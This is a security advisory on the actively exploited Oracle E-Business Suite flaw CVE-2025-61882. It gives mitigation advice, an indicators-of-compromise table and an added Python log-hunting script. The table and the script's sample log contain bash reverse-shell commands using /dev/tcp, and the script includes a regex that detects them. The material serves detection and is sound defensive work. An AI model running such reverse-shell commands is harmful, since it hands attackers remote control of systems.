Active Exploitation of Zero-Day Vulnerability in Oracle E-Business Suite
6 October 2025
Oracle has released security updates to address a critical vulnerability (CVE-2025-61882) in the Oracle E‑Business Suite. Users and administrators of affected products are advised to update to the latest versions immediately.
Background
Oracle has released security updates to address a critical vulnerability (CVE‑2025‑61882) in the Concurrent Processing component (BI Publisher Integration) of the Oracle E‑Business Suite. The vulnerability has a Common Vulnerability Scoring System (CVSSv3.1) score of 9.8 out of 10.
Impact
Successful exploitation of the vulnerability could allow an unauthenticated attacker to perform remote code execution.
Known Exploitation
The vulnerability is reportedly being exploited in Clop ransomware / data theft attacks. A proof-of-concept exploit is also publicly available.
Affected Products
The vulnerability affects Oracle E‑Business Suite versions 12.2.3 through 12.2.14.
Mitigation
Users and administrators of affected product versions are strongly advised to deploy the patch for their specific EBS version and ensure the October 2023 Critical Patch Update is installed before applying the patch.
Indicators of Compromise
Below are the indicators of compromise to support immediate detection, hunting, and containment.
Indicator | Type | Description |
---|---|---|
200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
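The following Python sketch is an added example, not part of the original advisory or any Oracle tooling. It shows one way to hunt for the indicators above in web and process logs. The function names, the log line formats and the sample lines are assumptions constructed for illustration.

```python
import hashlib
import re

# Indicators copied from the advisory table; IPs are kept defanged as published.
IOC_IPS = ["200[.]107[.]207[.]26", "185[.]181[.]60[.]11"]
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d": "PoC archive (.zip)",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121": "exp.py",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b": "server.py",
}
# Shape of the command indicator: interactive bash redirected to /dev/tcp/<host>/<port>.
REVSHELL_RE = re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/[^/\s]+/\d+")


def refang(indicator):
    """Turn a defanged indicator such as 1[.]2[.]3[.]4 back into 1.2.3.4."""
    return indicator.replace("[.]", ".")


# Match whole addresses only, so 185.181.60.110 does not hit on 185.181.60.11.
IP_RE = re.compile(
    r"(?<![\d.])(?:" + "|".join(re.escape(refang(ip)) for ip in IOC_IPS) + r")(?!\d|\.\d)"
)


def hunt_lines(lines):
    """Return (line_number, indicator_type, matched_text) for every hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hits += [(number, "ip", m.group(0)) for m in IP_RE.finditer(line)]
        hits += [(number, "command", m.group(0)) for m in REVSHELL_RE.finditer(line)]
    return hits


def match_hash(data, known=IOC_SHA256):
    """Return the label of the known file whose SHA-256 equals that of data, else None."""
    return known.get(hashlib.sha256(data).hexdigest())


# Constructed sample lines (not real telemetry); 192.0.2.10 is a documentation address.
SAMPLE_LOG = [
    '200.107.207.26 - - [06/Oct/2025:10:00:00 +0000] "POST /constructed/path HTTP/1.1" 200 512',
    '185.181.60.110 - - [06/Oct/2025:10:00:05 +0000] "GET /constructed/path HTTP/1.1" 200 128',
    'audit: cmdline="sh -c /bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"',
    '198.51.100.7 - - [06/Oct/2025:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in hunt_lines(SAMPLE_LOG):
        print(hit)
```

A hit on an IP address or the command pattern is a lead for investigation rather than proof of compromise; correlate it with the EBS host's outbound connections and patch status.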
References
https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
https://nvd.nist.gov/vuln/detail/CVE-2025-61882
https://thehackernews.com/2025/10/oracle-rushes-patch-for-cve-2025-61882.html